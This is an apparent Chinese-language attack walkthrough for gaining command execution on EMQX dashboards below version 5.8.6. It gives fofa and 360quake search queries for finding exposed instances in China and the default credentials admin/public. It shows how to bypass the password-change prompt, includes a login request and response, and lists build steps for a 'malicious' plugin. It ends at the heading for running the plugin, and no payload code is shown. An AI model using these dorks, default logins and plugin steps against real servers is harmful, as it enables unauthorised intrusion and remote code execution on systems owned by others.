EMQX后台插件命令执行

EMQX后台插件命令执行

前置条件

1. 有账号密码
2. 版本<5.8.6 版本

搜索引擎语法

• 360quake: country_cn: "中国" and title:"EMQX Dashboard"
• fofa: title="EMQX Dashboard" && is_domain=true && country="CN"

默认账号密码

• admin/public
• 首次登录会提示修改密码，点击跳过即可，如无跳过按钮，直接访问http://ip:18083/#/dashboard/overview即可访问后台。
• 请求数据包

POST /api/v5/login HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Bearer undefined
Content-Type: application/json
Content-Length: 40
Connection: keep-alive
Priority: u=0

{"username":"admin","password":"public"}

• 返回数据包

HTTP/1.1 200 OK
content-type: application/json
date: Wed, 09 Apr 2025 15:51:41 GMT
server: Cowboy
Content-Length: 195

{"license":{"edition":"ce"},"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NDQyMTc1MDE5OTYsImlzcyI6IkVNUVgifQ.TfrGwzAyyWNz27-2KDtatbmz0q2-714YmnjIWzCT-wc","version":"5.0.21-g97e7c439"}

后台插件上传执行命令

• 原文：https://ricardojoserf.github.io/emqxrce/

安装依赖

sudo apt update
sudo apt install -y build-essential autoconf libncurses5-dev libssl-dev libwxgtk3.2-dev libgl1-mesa-dev libglu1-mesa-dev libpng-dev libssh-dev unixodbc-dev cmake
git clone https://github.com/asdf-vm/asdf.git ~/.asdf --branch v0.13.1
echo '. "$HOME/.asdf/asdf.sh"' >> ~/.bashrc
echo '. "$HOME/.asdf/completions/asdf.bash"' >> ~/.bashrc
source ~/.bashrc
asdf --version

安装erlang、rebar3

asdf plugin-add erlang https://github.com/asdf-vm/asdf-erlang.git
asdf install erlang 25.3
asdf global erlang 25.3
wget https://s3.amazonaws.com/rebar3/rebar3
chmod +x rebar3
sudo mv rebar3 /local/bin/

创建插件

rebar3 new emqx-plugin my_emqx_plugin

修改恶意执行脚本

vim my_emqx_plugin/src/my_emqx_plugin.erl

编译插件并复制出来

make -C my_emqx_plugin rel
cp my_emqx_plugin/_build/default/emqx_plugrel/my_emqx_plugin-1.0.0.tar.gz .

执行恶意插件